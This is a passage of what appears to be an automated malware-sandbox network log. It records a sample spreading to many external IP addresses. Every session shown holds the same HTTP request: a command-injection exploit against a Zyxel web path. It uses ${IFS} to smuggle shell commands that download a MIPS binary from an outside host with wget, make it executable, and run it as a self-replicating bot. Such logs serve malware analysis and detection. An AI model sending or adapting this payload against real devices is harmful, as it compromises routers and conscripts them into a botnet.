                                      Jan 14, 2024 15:50:32.977229118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      887192.168.2.1460890147.20.184.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977271080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      888192.168.2.144852225.61.23.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977294922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      889192.168.2.144238647.3.241.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977327108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      890192.168.2.145771693.168.61.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977406025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      891192.168.2.1447068152.60.210.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977461100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      892192.168.2.1437706113.87.69.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977510929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      893192.168.2.1439918165.43.255.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977576971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      894192.168.2.143527239.19.102.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977608919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      895192.168.2.1447036146.24.50.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977667093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      896192.168.2.1440744145.224.91.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977725983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      897192.168.2.1447970206.33.239.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977775097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      898192.168.2.1438018136.12.253.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977828026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      899192.168.2.1436696192.120.139.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977871895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      900192.168.2.1432874167.83.90.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977922916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      901192.168.2.144821899.49.136.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977966070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      902192.168.2.144463214.12.71.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.977999926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      903192.168.2.145441085.137.0.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978039026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      904192.168.2.145867896.228.121.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978089094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      905192.168.2.1447158175.127.221.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978121042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      906192.168.2.144434896.106.123.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978178024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      907192.168.2.143780668.87.37.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978241920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      908192.168.2.145360883.145.153.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978280067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      909192.168.2.143508648.224.34.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978322983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      910192.168.2.1451646162.146.217.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978369951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      911192.168.2.1447784198.63.79.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978404045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      912192.168.2.1453290154.22.201.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978441000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      913192.168.2.145247864.112.251.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978494883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      914192.168.2.1455802167.33.219.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978530884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      915192.168.2.1443954172.80.75.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978589058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      916192.168.2.145725031.90.35.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978626966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      917192.168.2.14425008.169.51.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978652954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      918192.168.2.14447485.50.229.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978696108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      919192.168.2.1443950184.67.89.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978729010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      920192.168.2.144170427.86.180.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978792906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      921192.168.2.143534686.187.176.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978828907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      922192.168.2.1454862135.47.116.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978873014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      923192.168.2.1443214200.186.136.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978928089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      924192.168.2.1448658159.47.7.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.978981972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      925192.168.2.1435950141.10.179.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979015112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      926192.168.2.144837262.103.100.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979073048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      927192.168.2.144489876.38.135.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979118109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      928192.168.2.143612473.241.225.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979181051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      929192.168.2.1447850121.10.148.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979228020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      930192.168.2.1460178148.89.238.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979279995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      931192.168.2.145477068.222.228.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979307890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      932192.168.2.144520699.162.230.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979343891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      933192.168.2.144812867.135.149.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979392052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      934192.168.2.143522697.89.108.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979440928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      935192.168.2.1443120110.51.178.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979464054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      936192.168.2.1442060186.139.83.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979513884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      937192.168.2.146060496.224.110.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979576111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      938192.168.2.145577682.74.98.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979607105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      939192.168.2.1452920161.254.23.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979644060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      940192.168.2.144541897.163.2.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979710102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      941192.168.2.145004085.112.147.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979737043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      942192.168.2.1448080167.65.209.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979790926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      943192.168.2.1446866187.225.204.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979819059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      944192.168.2.1439458118.2.101.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979859114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      945192.168.2.1456800111.187.45.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979897976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      946192.168.2.1444634199.51.78.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979945898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      947192.168.2.144355099.240.28.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.979998112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      948192.168.2.1439756138.170.18.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.980031013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      949192.168.2.144624899.238.0.170443
                                      TimestampBytes transferredDirectionData
